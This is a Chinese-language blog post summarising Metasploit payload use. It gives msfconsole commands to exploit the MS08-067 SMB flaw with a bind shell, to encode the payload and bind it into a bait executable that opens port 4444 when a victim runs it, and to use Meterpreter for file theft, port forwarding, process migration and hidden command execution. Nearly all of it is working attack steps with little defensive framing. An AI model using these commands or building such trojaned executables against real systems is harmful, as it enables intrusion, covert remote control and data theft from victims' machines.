欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

【Metasploit总结】之【payload】

程序员文章站 2024-03-19 13:31:28
...

payload

发现漏洞后,如何选择payload。

典型payload

  • 使用exploit
msf6 > use exploit/windows/smb/ms08_067_netapi
  • 查看当前漏洞可利用payload
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
  • 查看payload信息
msf6 exploit(windows/smb/ms08_067_netapi) > info windows/shell/bind_tcp
  • 使用payload
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/bind_tcp

生成定制payload

  • 选择payload
msf6 exploit(windows/smb/ms08_067_netapi) > use windows/shell/bind_tcp
  • 编码
    避免“坏字符”。
    查看可使用编码方式:
msf6 payload(windows/shell/bind_tcp) > show encoders

尽量使用excellent的编码:

msf6 payload(windows/shell/bind_tcp) > generate -e cmd/powershell_base64 -i 2 -n 14 -o /root/Desktop/myPayload
# -e选择编码方式,-i编码次数,-o输出路径,-n增加14个“空命令”
# 也可以与一个exe查询绑定,当目标主机运行被绑定payload的程序后目标4444端口会被开放,可使用命令“nc <targetIP> 4444”连接:
msf6 payload(windows/shell_bind_tcp) > generate -e cmd/powershell_base64 -t exe -i 5 -k -x /root/Desktop/bait.exe -f /root/Desktop/bait_with_payload.exe

meterpreter payload

https://blog.csdn.net/qq_44874645/article/details/109544192

基本命令

background
# 保存会话,返回msfconsole

session
# 查看所有会话,进入会话:session -i <session id>

quit
# 关闭当前会话

shell
# 会话下使用,获取shell

文件系统命令

cat
# 查看文件内容

getwd
# 查看当前在目标的工作目录

upload nc.exe c:\
# 上传文件,-r上传目录

download c:\\nc.exe
# 下载文件,双斜杠需转移

edit c:\\windows\\system32\\drivers\\etc\\hosts
# 对文件进行编辑

search -d c:\\ -f *.mdb
# 搜索文件

网络命令

ipconfig

portwd add -l 1234 -p 3389 -r 192.168.1.131
# 端口转发,例:目标端口只允许内网访问3389,那么可用此条命令将其3389端口转发到本地,实现本地访目标3389端口
# -l本地端口发放,-r目标ip

route
# 路由信息

系统命令

ps
# 查看进程

migrate <pid>
# 将meterpreter会话转移到其它稳定进程,如explorer.exe

execute -H -i -f cmd.exe
# 在目标上隐藏执行cmd

getpid
# 获取当前meterpreter注入进程的pid

kill <pid>
# 结束指定进程

get uid
# 获得用户名,从而查看权限

sysinfo
# 系统信息

shutdown
# 关机
相关标签: Metasploit